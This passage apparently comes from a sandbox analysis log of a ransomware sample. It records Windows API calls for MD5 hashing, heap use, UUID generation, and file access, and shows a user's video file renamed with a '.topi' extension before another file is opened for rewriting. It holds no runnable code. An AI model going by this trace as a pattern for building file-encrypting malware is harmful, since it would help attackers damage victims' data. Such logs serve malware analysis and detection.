CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0096.918] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.918] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.918] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.918] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.918] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.919] GetLastError () returned 0x0 [0096.919] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.919] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0096.919] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.919] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.919] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.919] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.919] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x16530) returned 0x9a06a00 [0096.919] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.919] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02ee8 [0096.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b98 [0096.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02f30 [0096.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4bb0 [0096.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4be0 [0096.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4bf8 [0096.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.920] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4be0 | out: hHeap=0x680000) returned 1 [0096.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4bf8 | out: hHeap=0x680000) returned 1 [0096.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0096.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4bf8 [0096.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0096.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4be0 [0096.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0096.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4bf8 | out: hHeap=0x680000) returned 1 [0096.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4be0 | out: hHeap=0x680000) returned 1 [0096.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.920] GetCurrentThreadId () returned 0x8c4 [0096.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f8b20 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.921] GetCurrentThreadId () returned 0x8c4 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4be0 [0096.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0096.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4bf8 [0096.922] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.922] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4bc8 [0096.922] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.922] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.922] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.922] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4c10 [0096.922] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e49d0 [0096.922] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0096.923] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\3sSi1-59PLiPMEl5xfK.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_tgjm1g\\3ssi1-59plipmel5xfk.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\3sSi1-59PLiPMEl5xfK.mkv.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_tgjm1g\\3ssi1-59plipmel5xfk.mkv.topi")) returned 1 [0096.924] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\maGbw1-EQdYWWJa3QsH.swf") returned=".swf" [0096.924] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\maGbw1-EQdYWWJa3QsH.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_tgjm1g\\magbw1-eqdywwja3qsh.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.925] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=32869) returned 1 [0096.925] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.927] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x803f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.927] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.928] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.928] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0096.929] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.929] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.929] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.929] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.929] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.929] GetLastError () returned 0x0 [0096.929] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.929] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0096.929] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.929] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.929] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.929] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.930] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.930] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8070) returned 0x99f92d8 [0096.930] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.930] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02f30 [0096.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4bb0 [0096.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02f78 [0096.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4bc8 [0096.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4bf8 [0096.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c10 [0096.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.930] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.930] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4bf8 | out: hHeap=0x680000) returned 1 [0096.930] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c10 | out: hHeap=0x680000) returned 1 [0096.930] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.930] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.930] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0096.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4c10 [0096.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0096.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4bf8 [0096.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0096.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.931] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.931] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c10 | out: hHeap=0x680000) returned 1 [0096.931] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.931] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4bf8 | out: hHeap=0x680000) returned 1 [0096.931] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.931] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.931] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.931] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.931] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.931] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.931] GetCurrentThreadId () returned 0x8c4 [0096.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f8bb0 [0096.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0096.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.931] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.931] GetCurrentThreadId () returned 0x8c4 [0096.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.931] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0096.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.931] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4bf8 [0096.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0096.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c10 [0096.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4be0 [0096.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.933] HeapFree (in: 